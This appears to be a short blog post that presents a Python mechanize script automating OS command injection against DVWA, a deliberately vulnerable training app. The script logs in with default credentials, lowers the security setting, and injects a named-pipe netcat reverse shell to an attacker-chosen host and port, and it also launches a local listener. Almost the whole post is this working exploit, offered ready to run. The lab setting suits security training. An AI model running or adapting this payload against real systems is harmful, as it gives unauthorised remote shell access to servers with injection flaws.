Automated OS Injection Reverse Shell with Mechanize Against DVWA

Damn Vulnerable Web Application (DVWA) is an intentionally vulnerable web application used for training. DVWA is also one of the web applications on the OWASP Broken Web Applications Virtual Machine. This post is nothing more than a script that automates the exploitation of the OS injection vulnerability using Python’s mechanize module for browser automation.

# Tested on Windows against DVWA within the OWASP Broken Web App VM Version 1.2

import mechanize  
import sys
import os

rhost = sys.argv[1] #IP address of target DVWA application
lhost = sys.argv[2] #IP address of where you are catching the shell
lport = sys.argv[3] #Port where you want to catch the shell

def listener():
    """Opens a command prompt and starts a netcat listener"""
    os.system(r'start cmd.exe /k "nc -lvp" ' + str(lport))

def browse_and_exploit():
    """Logs into DVWA, sets security to low, and injects a payload"""
    br = mechanize.Browser() # create a browser object

    br.open("http://" + rhost + '/dvwa/login.php') # navigate to DVWA
    br.select_form(nr=0) # select the first (and only) form
    br.form['username']='admin' # fill in the login page
    br.form['password']='admin' 
    br.submit() #submit the form

    br.open('http://' + rhost + '/dvwa/security.php') #opens the security page
    br.select_form(nr=0) #selects the form
    br.form['security'] = ["low"] # changes the security setting to low
    br.submit()

    br.open('http://' + rhost + '/dvwa/vulnerabilities/exec/') #open command injection page
    br.select_form(nr=0) # select the form
 
    # Uses netcat on the target server to shovel a shell back to the listener
    br.form['ip']='google.com && rm -f /tmp/backpipe && mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc %s %s 1>/tmp/backpipe' % (lhost,lport) 
    br.submit() #submits the form and the shell should come

def main():
    listener()
    browse_and_exploit()
 
if __name__ == '__main__':
    main()

Leave a Reply

Your email address will not be published. Required fields are marked *